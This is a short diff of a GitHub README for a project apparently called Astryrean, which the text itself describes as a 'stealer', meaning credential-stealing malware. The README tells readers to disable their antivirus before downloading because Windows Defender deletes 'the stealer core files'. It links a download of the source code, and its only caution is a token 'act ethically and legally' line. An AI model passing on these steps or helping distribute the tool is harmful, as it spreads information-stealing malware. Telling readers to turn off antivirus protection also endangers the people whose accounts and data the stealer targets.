zakocord/Astryrean-Readme-fix/README.md

 > Please act **ethically and legally**.

 ---

-## TIP
+## Installation
 It is recommended that you disable your antivirus software before downloading, as Windows Defender will delete the stealer core files

----

-## Installation

 1. **Download the source code**
    [Download .zip](https://github.com/zakocord/Astryrean/archive/refs/heads/main.zip)